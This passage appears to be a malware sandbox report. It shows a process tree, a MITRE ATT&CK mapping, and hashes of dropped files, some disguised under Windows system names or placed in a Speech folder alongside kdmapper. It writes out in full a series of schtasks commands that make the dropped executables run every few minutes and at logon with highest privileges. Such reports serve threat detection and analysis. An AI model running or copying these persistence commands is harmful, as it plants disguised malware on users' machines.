        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5096
        
        C:\Recovery\WindowsRE\taskhostw.exe
        
        "C:\Recovery\WindowsRE\taskhostw.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\ChainSurrogateServersessionCrt\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\ChainSurrogateServersessionCrt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\ChainSurrogateServersessionCrt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\ChainSurrogateServersessionCrt\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\ChainSurrogateServersessionCrt\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\ChainSurrogateServersessionCrt\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommonc" /sc MINUTE /mo 5 /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommon" /sc ONLOGON /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "comBrowserfontCommonc" /sc MINUTE /mo 5 /tr "'C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ChainSurrogateServersessionCrt\AjINMi8J6kx3pWrbYYHviGjQ7go1FcYdMdMi4IhRz46EcvjyaTF.vbe

Filesize
220B

MD5
b0c078a91915fb69bea2a9aeccf8a7cb

SHA1
ecfd8f5b2a04e2e430cbb39e6ced49e620f8907f

SHA256
2d5d92c0be94fbce3cb8615d321e964cafc0deae0f1d8d7c9ca5ec568f85151f

SHA512
9a624163dc575bbdf4a7b9ac223f6f57c388b266f7c5b0919dc339086098a89ab7f9973d677bcead9a1bd6f6c9c6da47499fcbb7bfc3f470d37bb576c19a9ee2

Download Submit
C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe

Filesize
1.8MB

MD5
42b8f82f87208f2164578692825b54f4

SHA1
f8487bbef1aa1620c4b48964669075718ef895f6

SHA256
fe58084f904a2b68705124106d0811f336e23ab9e6db9b543de41c5946d716b7

SHA512
aba2d9fd77126e8d16dbe2b717a2682b58177ebca29312cd4b4de9a2ae7d8729af2b2956ba31f1dc108180be91d3a157ed75b76859ab2660de37e801bc09f4d3

Download Submit
C:\ChainSurrogateServersessionCrt\eTau3XGYlc3.bat

Filesize
115B

MD5
79ea866be4d7b731d61f95fb33482ea6

SHA1
4335e155c1f6ceeb0dc02bebbac972c5d8f666f5

SHA256
33466baca4d3f2c64362d48821fb248ed7e4ae32f03f8c458c06c03689fa8b45

SHA512
94f2b4a34e0bb312bc27ac4c1b3c6fd895786c6082346bf7cbb7a6b48b775213a0ce19e271dfa253b458788d05c526a6f0bfe985773319a816341ff8cfed540f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\PqwO27Ome3SRZg2Dd3LMX006.exe

Filesize
2.6MB

MD5
7c527966de43094f2c02bf861aa75498

SHA1
dbee5d9329b26517a46bed54c9c16b4c60335ca6

SHA256
c60e818930ec31fcb355925eb59138b2247434f2edb4b3244fb33b190eb1dc04

SHA512
aea0db71a069b156ccc4c8d2320fd8410d5f4a4d4159ad1113e04c9380b30854852ab93bdd9ef3eed2d4acfc0b8f3878f3f27613b0a9777dedc8af6b97cde08a

Download Submit
C:\Users\Admin\AppData\Local\Temp\184752.vbs

Filesize
125B

MD5
8b4ed5c47fdddbeba260ef11cfca88c6

SHA1
868f11f8ed78ebe871f9da182d053f349834b017

SHA256
170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

SHA512
87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\43372.vbs

Filesize
250B

MD5
745ad8f57c0517ea1065410f42439a42

SHA1
30428f88bd6712ccaad3823c1e4ee13d26f6ea94

SHA256
b6bbea109cb775e462ca0a7e52a190d8694ea31005050616bf65f25abe1cbd52

SHA512
a5d6e1b80784bca0d3dc3e0d217471fe4a62e52aaf51390c8d78c5812ebcb554571f20d4d2ed9490a14cd5c5e484c6d1e50a3f960ac0111e2fce8231b1c28247

Download Submit
C:\Users\Admin\AppData\Local\Temp\vrHapNwuMI.bat

Filesize
163B

MD5
284fcb0f2134630fb385b73e02081626

SHA1
beae2b855c4dbf698091737f3aa017c8d69c049c

SHA256
5bbd582efa69c205e3584b1abac9f70156ce0c0a63474ae25f61422897e3d4b4

SHA512
fb13e1fd078d0b26c132d17c2f54e85197a2bb4dd0d7f9e6a0f1184104894a921129854fc89aca52f69aead811452723414278c25af545b162b7538d5d6e2d11

Download Submit
C:\Windows\Speech\imxyvi.exe

Filesize
228KB

MD5
6e90c863f1166a43e590204d055ee08a

SHA1
c02e42892470124601b5b1126b2c780bb0f2c502

SHA256
54abe3ef576221e0d1341371378f36e9f63e3f5576069573910fcad5cf43b24f

SHA512
14a38a5b20b4972956349d4718b9a6ed8286c46c3758a28acc382b369b38dbc67f2d9019a95c26430e1d3c77088ad47af0ea96853e56eccb3fdafe36f289665c

Download Submit
C:\Windows\Speech\kdmapper.exe

Filesize
2.1MB

MD5
eba1a2045ca989e59d2b39805ef52851

SHA1
17c5a2013f7213c152b1d212c2a84dbbc54f6065

SHA256
4cd4231a17dab319314fccec4054b4a1c74c0244fdedbcfbb9e9e2228962f42a

SHA512
1acbed79480772605e8b7fca6d31d602ab4cf4544577609f3e8b7f077ba6a0a1d26568f3a713c94f416a3fa361f9f4e3969445e277ad78da42a6ddddce5f43b1

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
361KB

MD5
d6edf37d68da356237ae14270b3c7a1a

SHA1
37fcdb2a0fb6949e710a7e64e181993fd4cbcb29

SHA256
d5f6f3242c601e85eedff04cd45947f7890e908e51c57f90521eed59c8088b4b

SHA512
01ce470a7d19fb9e139c038ff5dd30b6d85409a87b298ae9d3106b5e2ef8712c0d7fc7e4587886dee47db040033b9d2d591a0cafc0001461a0dc07338f0baa21

Download Submit
memory/2076-44-0x0000000000B60000-0x0000000000D34000-memory.dmp

Filesize
1.8MB

Download
memory/2076-46-0x0000000002F30000-0x0000000002F3E000-memory.dmp

Filesize
56KB

Download
memory/2076-48-0x0000000003090000-0x00000000030AC000-memory.dmp

Filesize
112KB

Download
memory/2076-49-0x0000000003100000-0x0000000003150000-memory.dmp

Filesize
320KB

Download
memory/2076-51-0x00000000030B0000-0x00000000030C8000-memory.dmp

Filesize
96KB

Download
memory/2936-6-0x0000024A17CC0000-0x0000024A17CC1000-memory.dmp

Filesize
4KB

Download
memory/2936-3-0x0000024A17CB0000-0x0000024A17CB1000-memory.dmp

Filesize
4KB

Download
memory/3796-25-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/3796-23-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/3796-21-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5096-8-0x00000000009D0000-0x0000000000A30000-memory.dmp

Filesize
384KB

Download